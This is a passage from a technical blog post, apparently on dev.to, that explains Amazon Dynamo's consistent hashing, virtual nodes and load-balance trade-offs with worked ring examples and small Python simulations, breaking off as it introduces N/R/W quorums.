&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_456&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_789&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;

&lt;span class="c1"&gt;# After (4 servers):
&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_123&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="err"&gt;✓&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stayed&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_456&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;✓&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stayed&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_789&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="err"&gt;✓&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stayed&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# But wait - this is lucky! In reality, most keys MOVE:
&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;product_ABC&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;
&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;product_ABC&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="err"&gt;✗&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;MOVED&lt;/span&gt;&lt;span class="err"&gt;!&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;The disaster&lt;/strong&gt;: When you change the number of servers, nearly ALL your data needs to be redistributed. Imagine moving terabytes of data just to add one server!&lt;/p&gt;
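&lt;p&gt;To put a number on that, here is a quick simulation (hypothetical key set; md5 is used only because Python's built-in &lt;code&gt;hash()&lt;/code&gt; is salted per process) counting how many keys change servers when going from 3 to 4:&lt;/p&gt;

```python
# Quantify rehashing churn: what fraction of keys change servers
# when modulo-based sharding grows from 3 to 4 servers?
# (Hypothetical key set; md5 gives a hash that is stable across runs.)
import hashlib

def stable_hash(key: str) -> int:
    return int(hashlib.md5(key.encode()).hexdigest(), 16)

keys = [f"key_{i}" for i in range(100_000)]
moved = sum(1 for k in keys if stable_hash(k) % 3 != stable_hash(k) % 4)
print(f"{moved / len(keys):.0%} of keys moved")  # ~75% must migrate
```

&lt;p&gt;A key stays put only when &lt;code&gt;hash % 3 == hash % 4&lt;/code&gt;, which happens for just 3 of every 12 hash values — so roughly 75% of keys move.&lt;/p&gt;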

&lt;h4&gt;
  
  
  The Solution: Consistent Hashing
&lt;/h4&gt;

&lt;p&gt;Consistent hashing solves this by treating the hash space as a circle (0 to 2^32 - 1, wrapping around).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Place servers on the ring&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fchzvmjbqxjtebm3gzuus.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fchzvmjbqxjtebm3gzuus.png" alt="image" width="800" height="141"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Each server is assigned a random position on the ring (called a "token"). Think of this like placing markers on a circular racetrack.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2: Place data on the ring&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When you want to store data, you:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Hash the key to get a position on the ring&lt;/li&gt;
&lt;li&gt;Walk clockwise from that position&lt;/li&gt;
&lt;li&gt;Store the data on the first server you encounter&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc2zaylcuf0qtqoizfr2n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc2zaylcuf0qtqoizfr2n.png" alt="image" width="800" height="92"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Visual Example: Complete Ring
&lt;/h4&gt;

&lt;p&gt;Here's the ring laid out in order. Keys walk clockwise to the next server:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwtk8v49uqu7ecyi62wqx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwtk8v49uqu7ecyi62wqx.png" alt="image" width="800" height="141"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Simple rule&lt;/strong&gt;: A key walks clockwise until it hits a server. That server owns the key.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Examples&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;user_123&lt;/code&gt; at 30° → walks to 45° → &lt;strong&gt;Server A owns it&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;user_456&lt;/code&gt; at 150° → walks to 200° → &lt;strong&gt;Server C owns it&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cart_789&lt;/code&gt; at 250° → walks to 280° → &lt;strong&gt;Server D owns it&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;product_ABC&lt;/code&gt; at 300° → walks past 360°, wraps to 0°, continues to 45° → &lt;strong&gt;Server A owns it&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Who owns what range?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Server A (45°)&lt;/strong&gt;: owns everything from 281° to 45° (wraps around)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Server B (120°)&lt;/strong&gt;: owns everything from 46° to 120°&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Server C (200°)&lt;/strong&gt;: owns everything from 121° to 200°&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Server D (280°)&lt;/strong&gt;: owns everything from 201° to 280°&lt;/li&gt;
&lt;/ul&gt;
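&lt;p&gt;The clockwise walk is just a binary search over sorted tokens. Here is a minimal sketch of the ring above, using this example's toy 0°-359° hash space rather than a real 0 to 2^32 - 1 space:&lt;/p&gt;

```python
# Minimal consistent-hash ring for the four servers above.
# Toy 0-359 degree hash space; real rings use 0 to 2^32 - 1.
import bisect

ring = {45: "A", 120: "B", 200: "C", 280: "D"}
tokens = sorted(ring)  # [45, 120, 200, 280]

def owner(position: int) -> str:
    """Walk clockwise from `position` to the first server token."""
    idx = bisect.bisect_left(tokens, position)
    if idx == len(tokens):  # past the last token: wrap around to the start
        idx = 0
    return ring[tokens[idx]]

print(owner(30))   # A  (user_123)
print(owner(150))  # C  (user_456)
print(owner(250))  # D  (cart_789)
print(owner(300))  # A  (product_ABC wraps past 0°)
```

&lt;p&gt;Note that the server count never appears in the lookup — only the sorted token list does, which is exactly why membership changes stay local.&lt;/p&gt;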

&lt;h4&gt;
  
  
  The Magic: Adding a Server
&lt;/h4&gt;

&lt;p&gt;Now let's see why this is brilliant. We add Server E at position 160°:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;BEFORE:
Server A (45°)  → owns 281°-45°
Server B (120°) → owns 46°-120°
Server C (200°) → owns 121°-200°  ← THIS RANGE WILL SPLIT
Server D (280°) → owns 201°-280°

AFTER:
Server A (45°)  → owns 281°-45°   ← NO CHANGE
Server B (120°) → owns 46°-120°   ← NO CHANGE
Server E (160°) → owns 121°-160°  ← NEW! Takes part of C's range
Server C (200°) → owns 161°-200°  ← SMALLER range
Server D (280°) → owns 201°-280°  ← NO CHANGE
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Result&lt;/strong&gt;: Only keys in range 121°-160° need to move (from C to E). Servers A, B, and D are completely unaffected!&lt;/p&gt;

&lt;h4&gt;
  
  
  The Virtual Nodes Optimization
&lt;/h4&gt;

&lt;p&gt;There's a critical problem with the basic consistent hashing approach: &lt;strong&gt;random distribution can be extremely uneven&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Problem in Detail:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When you randomly assign one position per server, you're essentially throwing darts at a circular board. Sometimes the darts cluster together, sometimes they spread out. This creates hotspots.&lt;/p&gt;

&lt;p&gt;Let me show you a concrete example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Scenario: 4 servers with single random tokens

Server A: 10°   }
Server B: 25°   } ← Only 75° apart! Tiny ranges
Server C: 100°  }

Server D: 280°  ← 180° away from C! Huge range

Range sizes:
- Server A owns: 281° to 10° = 89° (25% of ring)
- Server B owns: 11° to 25° = 14° (4% of ring)  ← Underutilized!
- Server C owns: 26° to 100° = 74° (21% of ring)
- Server D owns: 101° to 280° = 179° (50% of ring)  ← Overloaded!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Real-world consequences:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Uneven load&lt;/strong&gt;: Server D handles 50% of all data while Server B handles only 4%. This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Server D's CPU, disk, and network are maxed out&lt;/li&gt;
&lt;li&gt;Server B is mostly idle (wasted capacity)&lt;/li&gt;
&lt;li&gt;Your 99.9th percentile latency is dominated by Server D being overloaded&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Hotspot cascading&lt;/strong&gt;: When Server D becomes slow or fails:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;All its 50% load shifts to Server A (the next one clockwise)&lt;/li&gt;
&lt;li&gt;Server A now becomes overloaded&lt;/li&gt;
&lt;li&gt;System performance degrades catastrophically&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Inefficient scaling&lt;/strong&gt;: Adding servers doesn't help evenly because new servers might land in already small ranges&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Visualizing the problem:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhld4cjtqh1566fb4qk1u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhld4cjtqh1566fb4qk1u.png" alt="image" width="800" height="148"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dynamo's solution&lt;/strong&gt;: Each physical server gets multiple virtual positions (tokens).&lt;/p&gt;

&lt;p&gt;Instead of one dart throw per server, throw many darts. The more throws, the more even the distribution becomes (law of large numbers).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How Virtual Nodes Fix the Problem:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Let's take the same 4 servers, but now each server gets 3 virtual nodes (tokens) instead of 1:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Physical Server A gets 3 tokens: 10°, 95°, 270°
Physical Server B gets 3 tokens: 25°, 180°, 310°
Physical Server C gets 3 tokens: 55°, 150°, 320°
Physical Server D gets 3 tokens: 75°, 200°, 340°

Now the ring looks like:
10° A, 25° B, 55° C, 75° D, 95° A, 150° C, 180° B, 200° D, 270° A, 310° B, 320° C, 340° D

Range sizes (approximately):
- Server A total: 30° + 20° + 70° = 120° (33% of ring)
- Server B total: 15° + 30° + 40° = 85° (24% of ring)
- Server C total: 30° + 55° + 10° = 95° (26% of ring)
- Server D total: 20° + 20° + 20° = 60° (17% of ring)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Much better!&lt;/strong&gt; Load now ranges from 17% to 33% instead of 4% to 50%.&lt;/p&gt;
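&lt;p&gt;You can watch the law of large numbers do this work with a short simulation. Token positions here are random (seeded so the run is reproducible), so the exact percentages are illustrative, not from the paper:&lt;/p&gt;

```python
# Sketch: ownership spread shrinks as tokens per server increase.
# Random token positions, fixed seed for reproducibility.
import random

RING = 2**32

def ownership(tokens_per_server, servers=("A", "B", "C", "D"), seed=7):
    rng = random.Random(seed)
    ring = sorted((rng.randrange(RING), s)
                  for s in servers for _ in range(tokens_per_server))
    share = {s: 0 for s in servers}
    for i, (pos, s) in enumerate(ring):
        prev = ring[i - 1][0]            # token before this one (wraps at i=0)
        share[s] += (pos - prev) % RING  # arc this token owns
    return {s: v / RING for s, v in share.items()}

for t in (1, 3, 128):
    shares = ownership(t)
    spread = max(shares.values()) - min(shares.values())
    print(f"{t:3d} tokens/server: max-min spread = {spread:.1%}")
```

&lt;p&gt;The spread between the most- and least-loaded server collapses as the token count grows.&lt;/p&gt;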

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fewxspmlsph7ynbtxoftt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fewxspmlsph7ynbtxoftt.png" alt="image" width="800" height="124"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why this works:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Statistics&lt;/strong&gt;: With more samples (tokens), the random distribution averages out. This is the law of large numbers in action.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Granular load distribution&lt;/strong&gt;: When a server fails, its load is distributed across many servers, not just one neighbor:&lt;br&gt;
&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;   Server A fails:
   - Its token at 10° → load shifts to Server B's token at 25°
   - Its token at 95° → load shifts to Server C's token at 150°
   - Its token at 270° → load shifts to Server B's token at 310°

   Result: The load is spread across multiple servers!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="3"&gt;
&lt;li&gt;
&lt;strong&gt;Smooth scaling&lt;/strong&gt;: When adding a new server with 3 tokens, it steals small amounts from many servers instead of a huge chunk from one server.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Real Dynamo configurations:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The paper mentions different strategies evolved over time. In production:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Early versions: 100-200 virtual nodes per physical server&lt;/li&gt;
&lt;li&gt;Later optimized to: Q/S tokens per node (where Q = total partitions, S = number of servers)&lt;/li&gt;
&lt;li&gt;Typical setup: Each physical server might have 128-256 virtual nodes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Trade-off: Balance vs Overhead&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;More virtual nodes means better load distribution, but there's a cost.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What you gain with more virtual nodes:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;With 1 token per server (4 servers):
Load variance: 4% to 50% (±46% difference) ❌

With 3 tokens per server (12 virtual nodes):
Load variance: 19% to 31% (±12% difference) ✓

With 128 tokens per server (512 virtual nodes):
Load variance: 24% to 26% (±2% difference) ✓✓
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What it costs:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Metadata size&lt;/strong&gt;: Each node maintains routing information&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;1 token per server: Track 4 entries&lt;/li&gt;
&lt;li&gt;128 tokens per server: Track 512 entries&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Gossip overhead&lt;/strong&gt;: Nodes exchange membership info periodically&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;More tokens = more data to sync between nodes&lt;/li&gt;
&lt;li&gt;Every second, nodes gossip their view of the ring&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Rebalancing complexity&lt;/strong&gt;: When nodes join/leave&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;More virtual nodes = more partition transfers to coordinate&lt;/li&gt;
&lt;li&gt;But each transfer is smaller (which is actually good for bootstrapping)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Dynamo's evolution:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The paper describes how Amazon optimized this over time:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Strategy 1 (Initial):
- 100-200 random tokens per server
- Problem: Huge metadata (multiple MB per node)
- Problem: Slow bootstrapping (had to scan for specific key ranges)

Strategy 3 (Current):
- Q/S tokens per server (Q=total partitions, S=number of servers)
- Equal-sized partitions
- Example: 1024 partitions / 8 servers = 128 tokens per server
- Benefit: Metadata reduced to KB
- Benefit: Fast bootstrapping (transfer whole partition files)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Real production sweet spot:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Most Dynamo deployments use 128-256 virtual nodes per physical server. This achieves:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Load distribution within 10-15% variance (good enough)&lt;/li&gt;
&lt;li&gt;Metadata overhead under 100KB per node (negligible)&lt;/li&gt;
&lt;li&gt;Fast failure recovery (load spreads across many nodes)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Why not more?&lt;/strong&gt; Diminishing returns. Going from 128 to 512 tokens only improves load balance by 2-3%, but quadruples metadata size and gossip traffic.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F801aqapc3s28hxrwb94d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F801aqapc3s28hxrwb94d.png" alt="image" width="800" height="1280"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key concept&lt;/strong&gt;: Physical servers (top) map to multiple virtual positions (bottom) on the ring. This distributes each server's load across different parts of the hash space.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Benefits&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;More even load distribution&lt;/li&gt;
&lt;li&gt;When a server fails, its load is distributed across many servers (not just one neighbor)&lt;/li&gt;
&lt;li&gt;When a server joins, it steals a small amount from many servers&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Real-World Impact Comparison
&lt;/h4&gt;

&lt;p&gt;Let's see the difference with real numbers:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Traditional Hashing (3 servers → 4 servers):
- Keys that need to move: ~75% (3 out of 4)
- Example: 1 million keys → 750,000 keys must migrate

Consistent Hashing (3 servers → 4 servers):
- Keys that need to move: ~25% (1 out of 4)
- Example: 1 million keys → 250,000 keys must migrate

With Virtual Nodes (150 vnodes total → 200 vnodes):
- Keys that need to move: still ~25%, but drawn evenly from every server
- Example: 1 million keys → ~250,000 keys migrate, in many small slices
- Load stays balanced before and after the change
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
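&lt;p&gt;These ratios are easy to check empirically. The sketch below (hypothetical setup: 50 tokens per server, md5 as the hash function) grows a virtual-node ring from 3 to 4 servers and counts migrated keys. Only keys captured by the new server's tokens move — and they come off all three existing servers:&lt;/p&gt;

```python
# Measure migration when a virtual-node ring grows from 3 to 4 servers.
# Hypothetical setup: 50 tokens per server, md5 as the hash function.
import bisect
import hashlib

RING = 2**32

def h(s: str) -> int:
    return int(hashlib.md5(s.encode()).hexdigest(), 16) % RING

def build_ring(servers, tokens_per_server=50):
    # Each server contributes tokens_per_server positions on the ring.
    return sorted((h(f"{s}#{i}"), s)
                  for s in servers for i in range(tokens_per_server))

def owner(ring, key: str) -> str:
    positions = [pos for pos, _ in ring]
    idx = bisect.bisect_left(positions, h(key)) % len(ring)  # wrap at end
    return ring[idx][1]

keys = [f"user_{i}" for i in range(20_000)]
before = build_ring(["A", "B", "C"])
after = build_ring(["A", "B", "C", "D"])
moved = sum(owner(before, k) != owner(after, k) for k in keys)
print(f"{moved / len(keys):.0%} of keys moved")  # roughly a quarter
```

&lt;p&gt;Every migrated key lands on the new server D, because the existing servers' tokens are unchanged between the two rings.&lt;/p&gt;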



&lt;h4&gt;
  
  
  The "Aha!" Moment
&lt;/h4&gt;

&lt;p&gt;The key insight is this: &lt;strong&gt;Consistent hashing decouples the hash space from the number of servers.&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Traditional: &lt;code&gt;server = hash(key) % num_servers&lt;/code&gt; ← num_servers is in the formula!&lt;/li&gt;
&lt;li&gt;Consistent: &lt;code&gt;server = ring.findNextClockwise(hash(key))&lt;/code&gt; ← num_servers isn't in the formula!&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is why adding/removing servers only affects a small portion of the data. The hash values don't change—only which server "owns" which range changes, and only locally.&lt;/p&gt;

&lt;p&gt;Think of it like a circular running track with water stations (servers). If you add a new water station, runners only change stations if they're between the old nearest station and the new one. Everyone else keeps going to their same station.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Replication Strategy (N, R, W)
&lt;/h3&gt;

&lt;h4&gt;
  
  
  The Problem: Availability vs Consistency Trade-off
&lt;/h4&gt;

&lt;p&gt;Imagine you're building Amazon's shopping cart. A customer adds an item to their cart, but at that exact moment:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;One server is being rebooted for maintenance&lt;/li&gt;
&lt;li&gt;Another server has a network hiccup&lt;/li&gt;
&lt;li&gt;A third server is perfectly fine&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Traditional database approach&lt;/strong&gt; (strong consistency):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client: "Add this item to my cart"
Database: "I need ALL replicas to confirm before I say yes"
Server 1: ✗ (rebooting)
Server 2: ✗ (network issue)
Server 3: ✓ (healthy)

Result: "Sorry, service unavailable. Try again later."
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Customer experience&lt;/strong&gt;: 😡 "I can't add items to my cart during Black Friday?!"&lt;/p&gt;

&lt;p&gt;This is unacceptable for e-commerce. Every rejected write is lost revenue.&lt;/p&gt;

&lt;h4&gt;
  
  
  Dynamo's Solution: Tunable Quorums
&lt;/h4&gt;

&lt;p&gt;Dynamo gives you three knobs to tune the exact trade-off you want:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;N&lt;/strong&gt;: Number of replicas (how many copies of the data)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;R&lt;/strong&gt;: Read quorum (how many replicas must respond for a successful read)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;W&lt;/strong&gt;: Write quorum (how many replicas must acknowledge for a successful write)&lt;/li&gt;
&lt;/ul&gt;

